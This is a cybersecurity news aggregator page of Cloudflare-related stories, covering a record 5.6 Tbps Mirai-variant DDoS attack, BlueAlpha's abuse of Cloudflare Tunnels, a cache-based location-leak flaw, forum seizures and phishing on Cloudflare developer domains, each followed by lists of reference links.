CyberSecurity news

FlagThis - #cloudflare

CISO2CISO Editor 2@ciso2ciso.com - 37d

Mirai Botnet Launches Massive 5.6 Tbps DDoS Attack - Cloudflare mitigated a record-breaking 5.6 Tbps DDoS attack launched by a Mirai-variant botnet, highlighting the need for robust DDoS mitigation strategies.
Cloudflare successfully mitigated a record-breaking 5.6 Tbps Distributed Denial of Service (DDoS) attack on October 29, 2024. The attack, launched by a Mirai-variant botnet, targeted an internet service provider (ISP) in East Asia. The botnet comprised of 13,000 compromised IoT devices flooding the target with malicious data, which aimed to cripple the ISP’s operations.

The attack lasted only 80 seconds, but Cloudflare's autonomous defence systems promptly identified and mitigated the anomalous traffic without human intervention, intercepting and neutralizing the malicious data at Cloudflare's edge nodes. Each IP address within the botnet generated an average traffic of approximately 4 Gbps. The successful defense highlights the escalating sophistication and scale of DDoS threats, with hyper-volumetric attacks exceeding 1 Tbps dramatically increasing. This incident underscores the importance of robust DDoS mitigation strategies and the need for continuous evolution in network security.

Recommended read:
References :
  • ciso2ciso.com: New Mirai Malware Variant Targets AVTECH Cameras, Huawei Routers – Source: www.infosecurity-magazine.com
  • securityaffairs.com: New Mirai botnet variant Murdoc Botnet targets AVTECH IP cameras and Huawei HG532 routers
  • The Hacker News: Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers
  • Techzine Global: Mirai variant Murdoc_Botnet targets cameras and routers
  • ciso2ciso.com: New Mirai Malware Variant Targets AVTECH Cameras, Huawei Routers – Source: www.infosecurity-magazine.com
  • discuss.privacyguides.net: New botnet network targets Avtech cameras and Hauwei HG532 routers
  • hackread.com: New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT Exploits
  • bsky.app: Interesting research from Qualys here where they found a botnet that’s infected vulnerable AVTECH cameras and Huawei routers.
  • cyberpress.org: New IoT Botnet Launching large-scale DDoS attacks Hijacking IoT Devices
  • gbhackers.com: New IoT Botnet Launching Large-Scale DDoS attacks Hijacking IoT Devices
  • securityonline.info: IoT Botnet Fuels Large-Scale DDoS Attacks Targeting Global Organizations
  • ciso2ciso.com: Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers – Source:thehackernews.com
  • ciso2ciso.com: New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT Exploits
  • Pyrzout :vm:: Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers
  • ciso2ciso.com: Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices.
  • ciso2ciso.com: Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices
  • ciso2ciso.com: Details about the mitigation of the DDoS attack.
  • gbhackers.com: Record Breaking 5.6 Tbps DDoS attack Launched by Mirai Botnet
  • ciso2ciso.com: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • gbhackers.com: Record Breaking 5.6 Tbps DDoS attack Launched by Mirai Botnet
  • securityonline.info: Mirai Botnet Unleashes Record-Breaking DDoS Attack, Cloudflare Thwarts Threat
  • hackread.com: Cloudflare mitigated a record-breaking 5.6 Tbps DDoS attack
  • gbhackers.com: Researchers have identified an active malware campaign involving a Mirai botnet variant, dubbed Murdoc, which has been targeting AVTECH cameras and Huawei HG532 routers since at least July 2024.
  • BleepingComputer: The largest distributed denial-of-service (DDoS) attack to date peaked at 5.6 terabits per second and came from a Mirai-based botnet with 13,000 compromised devices.
  • gbhackers.com: Researchers have identified an active malware campaign involving a Mirai botnet variant, dubbed Murdoc, which has been targeting AVTECH cameras and Huawei HG532 routers since at least July 2024.
  • securityonline.info: On October 29, 2024, Cloudflare revealed details of a DDoS attack orchestrated using a Mirai botnet comprising 13,000
  • Pyrzout :vm:: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • blog.cloudflare.com: In 2024, Cloudflare's autonomous DDoS defense systems blocked 21.3M DDoS attacks, up 53% YoY, and 420 DDoS attacks in Q4 2024 exceeded 1 Tbps, up 1,885% QoQ (The Cloudflare Blog)
  • Pyrzout :vm:: Cloudflare thwarts a massive 5.6 Tbps Mirai-variant DDoS attack targeting one of its customers
do son@Cybersecurity News - 82d

BlueAlpha APT Leverages Cloudflare Tunnels for Malware Distribution - The Russian APT group BlueAlpha is using Cloudflare Tunnels to distribute custom malware, employing spearphishing and HTML smuggling to maintain persistent network access.
The Russian state-sponsored APT group, BlueAlpha, is employing sophisticated techniques to deliver custom malware, including GammaDrop and GammaLoad. They leverage Cloudflare Tunnels to mask their malicious activity, making detection and disruption more difficult. This abuse of legitimate infrastructure involves spearphishing campaigns with malicious HTML attachments that bypass email security measures. The malware, delivered through HTML smuggling and advanced techniques, allows for credential theft, data exfiltration, and persistent backdoor access to compromised networks.

BlueAlpha's use of Cloudflare's TryCloudflare tool, a free tunneling service, allows them to create random subdomains, routing traffic through the Cloudflare network and concealing their staging infrastructure. Further complicating detection, they utilize DNS fast-fluxing to hinder tracking and disruption of command-and-control (C2) communications. The group's advanced HTML smuggling techniques, including embedding malicious JavaScript within HTML attachments and exploiting the onerror HTML event to trigger malicious code execution, demonstrate a high level of sophistication and pose a significant security threat. This highlights the increasing trend of threat actors using legitimate services for malicious purposes.

Recommended read:
References :
  • bsky.app: News report on Russian hackers abusing Cloudflare's service to drop GammaDrop malware.
  • Cyber Security News: Article detailing BlueAlpha's use of Cloudflare Tunnels for malware delivery.
  • gbhackers.com: Analysis of BlueAlpha's tactics, including use of Cloudflare Tunnels and DNS fast-fluxing.
  • securityonline.info: News about BlueAlpha exploiting Cloudflare Tunnels for GammaDrop malware infrastructure.
  • www.csoonline.com: Report about Russian hackers abusing Cloudflare tunneling service to deploy GammaDrop malware.
  • SOC Prime Blog: BlueAlpha Attack Detection: russia-affiliated Hacking Collective Abuses Cloudflare Tunnels to Distribute GammaDrop Malware
  • malware.news: BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure
  • The Hacker News: Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware
  • bsky.app: Details on BlueAlpha's use of Cloudflare Tunnels to hide GammaDrop malware in phishing attacks.
  • www.cysecurity.news: Hackers Exploit Cloudflare Tunnels and DNS Fast-Flux to Conceal GammaDrop Malware
gist.github.com via pushcx@lobste.rs - 28d

Cloudflare Zero-Click Deanonymization, Forum Seizure - A 15-year-old hacker discovered a 0-click deanonymization attack using Cloudflare's caching, impacting Signal and Discord and online cybercrime platforms were seized by law enforcement in a major operation.
A 15-year-old hacker has uncovered a significant security vulnerability related to Cloudflare's caching feature. This "zero-click deanonymization attack" can expose a user's precise location, within a 250-mile radius, without any interaction required from the user. The exploit impacts several popular platforms, including Signal and Discord, raising concerns for privacy among users. The hacker published a research paper warning about this undetectable exploit, targeted towards journalists, activists, and hackers, highlighting how attackers could send a malicious payload and reveal locations within seconds.

Multiple online cybercrime platforms including Cracked, Nulled, Sellix, and StarkRDP, have been seized by law enforcement in a large international operation. These sites, which facilitated the trading of stolen data, malware, and hacking tools, were used by over 10 million users. The operation involved authorities from multiple countries, and included arrests, property searches, and the confiscation of devices and funds. Europol reports that these platforms had generated over a million euros in illicit profits. The shutdown also targeted supporting services like financial processor Sellix and hosting service StarkRDP. Authorities indicate that these forums also offered AI-based tools to automate security vulnerability scans and enhance phishing attacks.

Recommended read:
References :
  • lobste.rs: Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform
  • The Hacker News: Authorities Seize Domains of Popular Hacking Forums in Major Cybercrime Crackdown
  • blog.cloudflare.com: Cloudflare : Cloudflare released an outage postmortum for yesterday's incident in which multiple Cloudflare services were unavailable for almost a full hour.
  • BleepingComputer: A routine attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage yesterday that brought down multiple services for nearly an hour.
  • www.bleepingcomputer.com: A routine attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage yesterday that brought down multiple services for nearly an hour.
  • BleepingComputer: A routine attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage yesterday that brought down multiple services for nearly an hour.
  • cyb_detective: An attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage that brought down multiple services for nearly an hour.
  • Anonymous ???????? :af:: An attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage that brought down multiple services for nearly an hour.
  • : Cloudflare : Cloudflare released an outage postmortum for yesterday's incident in which multiple Cloudflare services were unavailable for almost a full hour. This caused all operations against R2 object storage to fail for the duration of the incident, and caused a number of other Cloudflare services that depend on R2 to fail as well.
  • bsky.app: A routine attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage yesterday that brought down multiple services for nearly an hour.
  • BleepingComputer: A routine attempt to block a phishing URL in Cloudflare's R2 object storage platform backfired yesterday, triggering a widespread outage that brought down multiple services for nearly an hour.
  • : Cloudflare released an outage postmortum for yesterday's incident in which multiple Cloudflare services were unavailable for almost a full hour.
Mels Dees@Techzine Global - 86d

Cloudflare Developer Domains Abused for Cyber Attacks - Cybercriminals are exploiting Cloudflare Pages and Workers for phishing attacks.
Cybercriminals are exploiting Cloudflare's Pages (.dev) and Workers (.dev) platforms for malicious activities, leveraging Cloudflare's trusted reputation to enhance the success of their attacks. These platforms, intended for legitimate web development and deployment, are being misused to host phishing attacks, malicious web pages, and targeted email lists. This abuse highlights the risk of attackers leveraging reputable services for nefarious purposes, thereby increasing the likelihood of unsuspecting users falling victim to their schemes. The attackers are exploiting Cloudflare's global reach and security features to make their phishing campaigns appear more legitimate and harder to detect.

Security analysts at FORTRA have reported an explosive growth in phishing attacks utilizing Cloudflare Pages and Workers. Specifically, a 198% increase in attacks targeting Cloudflare Pages and a 104% surge in attacks against Cloudflare Workers were observed. These attacks utilize various techniques, including the use of bccfoldering to hide recipient lists in email campaigns and the creation of CAPTCHA-like human verification pages to add an air of legitimacy to phishing attempts. The ease of use and free hosting offered by Cloudflare, combined with features like SSL/TLS encryption, custom domains, and URL masking, make these platforms particularly attractive to malicious actors.

The increasing abuse of Cloudflare's developer domains underscores the need for enhanced security measures and vigilance. Attackers are taking advantage of Cloudflare's trusted infrastructure and reverse proxy capabilities to make their attacks more difficult to trace and detect. This highlights the challenge of balancing the benefits of accessible developer platforms with the need to mitigate their potential for misuse. The significant increase in phishing attacks using these platforms emphasizes the urgency for both Cloudflare and users to adapt to this evolving threat landscape and implement stronger protective measures.

Recommended read:
References :
  • Cyber Security News: Cybercriminals are increasingly exploiting Cloudflare Pages (Pages.dev) and Workers (Workers.dev) for phishing and other attacks, leveraging Cloudflare’s trusted reputation and services for malicious purposes.
  • Ian Campbell: My toot is lost to time due to autodelete, but two months ago I called out* a major uptick in malicious actors using Cloudflare's pages[.]dev to attack people. Looks like Fortra dove deep on it, finally:
  • Techzine Global: Explosive growth in phishing via Cloudflare Pages and Workers
  • gbhackers.com: Cloudflare Developer Domains Abused For Cyber Attacks
  • www.bleepingcomputer.com: Hackers use Cloudflare to deploy malware
@www.bleepingcomputer.com - 34d

Cloudflare Mitigates Massive DDoS and Leaks Location Data - Cloudflare mitigated a record-breaking 5.6 Tbps DDoS attack and addressed a CDN vulnerability that could expose users' location.
Cloudflare has recently mitigated a record-breaking 5.6 Tbps DDoS attack, showcasing the increasing sophistication and scale of cyber threats. The attack, a Mirai-variant botnet attack, originated from approximately 13,000 IoT devices and targeted an East Asian Internet Service Provider. This follows a previous 3.8 Tbps DDoS attack mitigated by Cloudflare in October 2024. The new attack which lasted only 80 seconds and was successfully defended by Cloudflare's automated systems, highlights a worrying trend of escalating hyper-volumetric attacks, with attacks over 1Tbps increasing by a staggering 1,885% from the previous quarter. The company also noted a 53% increase in the frequency of all DDoS attacks throughout 2024, blocking an average of 4,870 attacks per hour.

A vulnerability in Cloudflare's CDN has also been identified that could expose users' general location. This vulnerability, discovered by a security researcher, allows a person's location to be determined by simply sending an image on platforms such as Signal and Discord. Cloudflare's CDN caches media at data centers closest to users, allowing their general location to be determined through cached responses to an image. It was found that this type of location tracking could achieve an accuracy between 50 and 300 miles, potentially creating privacy and security concerns. While Cloudflare has addressed the specific vulnerability, it has been noted that location attacks could still be performed via other methods.

Recommended read:
References :
  • ciso2ciso.com: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • BleepingComputer: A security researcher discovered a flaw in Cloudflare's content delivery network (CDN), which could expose a person's general location by simply sending them an image on platforms like Signal and Discord.
  • www.scworld.com: User location data exposure threatened by Cloudflare CDN vulnerability
CISO2CISO Editor 2@ciso2ciso.com - 36d

Cloudflare Mitigates Massive Mirai Botnet DDoS - Cloudflare mitigated a 5.6 Tbps Mirai-variant DDoS attack originating from over 13,000 compromised IoT devices, exploiting vulnerabilities in AVTECH IP cameras and Huawei routers, blocking 21.3 million DDoS attacks in 2024.
References: ciso2ciso.com , Pyrzout :vm: ,
Cloudflare has successfully mitigated a massive 5.6 Tbps Distributed Denial-of-Service (DDoS) attack, a record-breaking event highlighting the increasing threat of hyper-volumetric assaults. The attack, originating from a Mirai-variant botnet, targeted an East Asian Internet Service Provider on October 29th and lasted for 80 seconds. This incident underscores the growing sophistication and scale of DDoS threats, with this particular attack leveraging over 13,000 compromised IoT devices. Cloudflare's autonomous defense systems were able to promptly mitigate the attack.

The Mirai-variant botnet, known as "Murdoc," is exploiting vulnerabilities in AVTECH IP cameras and Huawei HG532 routers using CVE-2024-7029 and CVE-2017-17215. The Murdoc botnet campaign uses ELF files and shell scripts for propagation, downloading and executing malicious payloads on devices. The botnet has been found on over 1300 identified IPs and uses more than 100 command-and-control servers. This has resulted in a significant global impact, with Malaysia, Thailand, Mexico, and Indonesia being the most affected. In 2024, Cloudflare blocked 21.3 million DDoS attacks, a 53% year-over-year increase, and 420 attacks in Q4 exceeded 1 Tbps.

Recommended read:
References :
  • ciso2ciso.com: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • Pyrzout :vm:: Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack – Source:hackread.com
  • Techmeme: In 2024, Cloudflare's autonomous DDoS defense systems blocked 21.3M DDoS attacks, up 53% YoY, and 420 DDoS attacks in Q4 2024 exceeded 1 Tbps, up 1,885% QoQ (The Cloudflare Blog)

Blogs

Research Tools